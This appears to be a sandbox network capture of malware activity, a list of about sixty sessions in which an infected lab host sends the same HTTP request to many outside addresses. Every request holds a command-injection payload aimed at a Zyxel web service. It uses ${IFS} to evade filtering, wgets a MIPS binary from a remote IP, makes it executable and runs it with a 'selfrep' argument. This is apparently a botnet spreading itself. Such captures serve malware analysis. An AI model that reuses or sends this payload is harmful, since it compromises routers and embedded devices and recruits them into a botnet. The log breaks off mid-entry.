                                      7097192.168.2.1451230148.242.225.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547218084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7098192.168.2.1441678123.190.60.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547291040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7099192.168.2.1448928116.16.177.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547310114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7100192.168.2.1458392156.206.103.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547312021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7101192.168.2.1442012183.102.45.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547343016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7102192.168.2.145251073.230.81.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547400951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7103192.168.2.1436632192.164.204.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547441006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7104192.168.2.145377251.195.158.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547496080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7105192.168.2.145014853.152.252.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547561884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7106192.168.2.145971857.12.29.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547595978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7107192.168.2.145359282.68.252.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547645092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7108192.168.2.1442760104.167.66.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547683001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7109192.168.2.145133684.88.231.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547724009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7110192.168.2.1460902216.238.197.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547746897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7111192.168.2.1439048155.210.167.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547796011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7112192.168.2.144101272.213.4.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547842026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7113192.168.2.144810468.144.42.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547874928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7114192.168.2.144536670.214.212.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547921896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7115192.168.2.144488674.30.80.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547974110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7116192.168.2.143329276.80.105.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.548001051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7117192.168.2.144230679.45.135.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.548032999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7118192.168.2.1450234158.249.10.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.548074007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7119192.168.2.144435866.74.94.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.548114061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7120192.168.2.1437796122.77.24.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.548150063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7121192.168.2.145584237.7.164.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.548197985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7122192.168.2.144081493.184.120.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.548237085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7123192.168.2.146089631.173.203.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.548269033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7124192.168.2.1444948112.223.65.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.548274040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7125192.168.2.143624096.50.44.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.548316956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7126192.168.2.1446868164.77.13.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.548378944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7127192.168.2.1438358154.240.57.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.548422098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7128192.168.2.144742876.2.46.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.548464060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7129192.168.2.145887217.218.75.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.548513889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7130192.168.2.143549439.26.132.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.548553944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7131192.168.2.1459468140.170.111.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.548605919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7132192.168.2.143570012.53.240.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.548654079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7133192.168.2.1449774196.186.140.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.548712969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7134192.168.2.143489271.105.187.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.548779964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7135192.168.2.1451960169.189.0.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.548830032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7136192.168.2.1443884164.95.196.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.548861980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7137192.168.2.1445562177.10.47.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.548902035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7138192.168.2.1433276212.77.161.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.548959017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7139192.168.2.1440640186.249.11.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549016953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7140192.168.2.1455594149.234.62.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549053907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7141192.168.2.1433498211.123.37.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549088001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7142192.168.2.143567449.124.22.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549130917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7143192.168.2.145471070.159.203.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549170971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7144192.168.2.145580478.122.74.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549206018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7145192.168.2.1447688176.25.218.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549206972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7146192.168.2.144820078.12.32.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549262047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7147192.168.2.1456840189.138.249.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549318075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7148192.168.2.1436300188.160.204.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549367905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7149192.168.2.145555459.16.146.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549396992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7150192.168.2.144710418.157.38.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549423933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7151192.168.2.1449954114.52.78.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549478054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7152192.168.2.14529709.33.227.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549530983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7153192.168.2.145487843.81.52.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549554110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7154192.168.2.1437452146.122.156.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549583912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7155192.168.2.1441806221.63.253.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549618006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7156192.168.2.1433596176.37.182.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549671888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7157192.168.2.1446176219.94.198.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549700975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7158192.168.2.145242024.36.222.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549711943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7159192.168.2.145121274.54.159.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549777031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7160192.168.2.145490293.112.204.167443
                                      TimestampBytes transferredDirectionData
